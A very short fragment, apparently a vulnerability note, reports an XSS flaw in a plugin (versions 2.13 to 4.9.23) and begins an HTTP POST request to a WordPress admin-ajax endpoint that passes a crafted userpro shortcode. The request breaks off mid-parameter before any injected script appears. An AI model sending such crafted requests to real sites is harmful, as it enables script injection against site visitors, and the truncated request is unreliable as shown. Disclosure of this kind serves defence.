An XSS vulnerability that affects from version 2.13 to 4.9.23.
POST /wp-admin/admin-ajax.php Host: domain.com action=userpro_shortcode_template&shortcode;=[userpro id=1 layout=“float” collage_per_page=“20” emd_paginate_top=“1” emd_paginate=“1” emd_gender="Gender,radi